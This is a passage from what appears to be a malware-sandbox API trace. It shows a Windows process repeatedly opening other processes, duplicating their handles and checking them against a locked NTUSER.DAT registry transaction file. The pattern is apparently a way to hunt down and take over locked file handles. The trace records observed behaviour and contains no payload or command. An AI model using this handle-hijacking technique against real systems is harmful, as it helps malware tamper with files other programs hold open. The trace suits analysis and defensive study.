dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.143] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.143] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.144] CloseHandle (hObject=0x670) returned 1 [0154.144] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.144] CloseHandle (hObject=0x680) returned 1 [0154.144] CloseHandle (hObject=0x62c) returned 1 [0154.144] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0154.144] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.145] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.145] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.145] CloseHandle (hObject=0x670) returned 1 [0154.145] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0154.145] CloseHandle (hObject=0x680) returned 1 [0154.145] CloseHandle (hObject=0x62c) returned 1 [0154.146] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0154.146] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.146] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.147] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.147] CloseHandle (hObject=0x670) returned 1 [0154.147] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.147] CloseHandle (hObject=0x680) returned 1 [0154.147] CloseHandle (hObject=0x62c) returned 1 [0154.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0154.147] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.148] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.149] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.149] CloseHandle (hObject=0x670) returned 1 [0154.149] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.149] CloseHandle (hObject=0x680) returned 1 [0154.149] CloseHandle (hObject=0x62c) returned 1 [0154.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0154.149] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.150] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.150] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.150] CloseHandle (hObject=0x670) returned 1 [0154.150] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.150] CloseHandle (hObject=0x680) returned 1 [0154.151] CloseHandle (hObject=0x62c) returned 1 [0154.151] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0154.151] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.151] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.152] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.152] CloseHandle (hObject=0x670) returned 1 [0154.152] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.152] CloseHandle (hObject=0x680) returned 1 [0154.152] CloseHandle (hObject=0x62c) returned 1 [0154.152] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0154.152] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.153] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.154] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.154] CloseHandle (hObject=0x670) returned 1 [0154.154] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.154] CloseHandle (hObject=0x680) returned 1 [0154.154] CloseHandle (hObject=0x62c) returned 1 [0154.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0154.154] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.154] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.155] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.155] CloseHandle (hObject=0x670) returned 1 [0154.155] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.155] CloseHandle (hObject=0x680) returned 1 [0154.155] CloseHandle (hObject=0x62c) returned 1 [0154.155] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0154.155] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.155] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.156] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.156] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.157] CloseHandle (hObject=0x670) returned 1 [0154.157] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.157] CloseHandle (hObject=0x680) returned 1 [0154.157] CloseHandle (hObject=0x62c) returned 1 [0154.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0154.157] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.158] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.158] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.158] CloseHandle (hObject=0x670) returned 1 [0154.158] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.158] CloseHandle (hObject=0x680) returned 1 [0154.158] CloseHandle (hObject=0x62c) returned 1 [0154.158] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0154.159] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.159] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.160] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.160] CloseHandle (hObject=0x670) returned 1 [0154.160] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.160] CloseHandle (hObject=0x680) returned 1 [0154.160] CloseHandle (hObject=0x62c) returned 1 [0154.160] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0154.160] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.161] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.162] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.162] CloseHandle (hObject=0x670) returned 1 [0154.162] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.162] CloseHandle (hObject=0x680) returned 1 [0154.162] CloseHandle (hObject=0x62c) returned 1 [0154.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0154.162] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.163] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.163] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.163] CloseHandle (hObject=0x670) returned 1 [0154.163] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.163] CloseHandle (hObject=0x680) returned 1 [0154.163] CloseHandle (hObject=0x62c) returned 1 [0154.164] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0154.164] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.164] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.164] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.165] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.165] CloseHandle (hObject=0x670) returned 1 [0154.165] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.165] CloseHandle (hObject=0x680) returned 1 [0154.165] CloseHandle (hObject=0x62c) returned 1 [0154.165] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0154.165] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.166] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.166] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.166] CloseHandle (hObject=0x670) returned 1 [0154.166] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.166] CloseHandle (hObject=0x680) returned 1 [0154.166] CloseHandle (hObject=0x62c) returned 1 [0154.167] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0154.167] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.167] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.168] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.168] CloseHandle (hObject=0x670) returned 1 [0154.168] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.168] CloseHandle (hObject=0x680) returned 1 [0154.168] CloseHandle (hObject=0x62c) returned 1 [0154.168] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0154.168] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.169] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.170] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.170] CloseHandle (hObject=0x670) returned 1 [0154.170] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.170] CloseHandle (hObject=0x680) returned 1 [0154.170] CloseHandle (hObject=0x62c) returned 1 [0154.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0154.170] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.171] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.171] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.171] CloseHandle (hObject=0x670) returned 1 [0154.171] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.171] CloseHandle (hObject=0x680) returned 1 [0154.171] CloseHandle (hObject=0x62c) returned 1 [0154.172] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0154.172] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.172] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.173] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.173] CloseHandle (hObject=0x670) returned 1 [0154.173] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.173] CloseHandle (hObject=0x680) returned 1 [0154.173] CloseHandle (hObject=0x62c) returned 1 [0154.173] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0154.174] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.175] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.175] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.175] CloseHandle (hObject=0x670) returned 1 [0154.175] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.175] CloseHandle (hObject=0x680) returned 1 [0154.175] CloseHandle (hObject=0x62c) returned 1 [0154.175] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0154.175] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.176] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.177] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.177] CloseHandle (hObject=0x670) returned 1 [0154.177] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.177] CloseHandle (hObject=0x680) returned 1 [0154.177] CloseHandle (hObject=0x62c) returned 1 [0154.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0154.177] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.178] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.178] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.179] CloseHandle (hObject=0x670) returned 1 [0154.179] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.179] CloseHandle (hObject=0x680) returned 1 [0154.179] CloseHandle (hObject=0x62c) returned 1 [0154.179] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0154.179] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.179] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.180] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.180] CloseHandle (hObject=0x670) returned 1 [0154.180] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.180] CloseHandle (hObject=0x680) returned 1 [0154.180] CloseHandle (hObject=0x62c) returned 1 [0154.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0154.180] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.181] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.181] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.182] CloseHandle (hObject=0x670) returned 1 [0154.182] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.182] CloseHandle (hObject=0x680) returned 1 [0154.182] CloseHandle (hObject=0x62c) returned 1 [0154.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0154.182] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.183] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.183] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.183] CloseHandle (hObject=0x670) returned 1 [0154.183] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.183] CloseHandle (hObject=0x680) returned 1 [0154.184] CloseHandle (hObject=0x62c) returned 1 [0154.184] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0154.184] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | 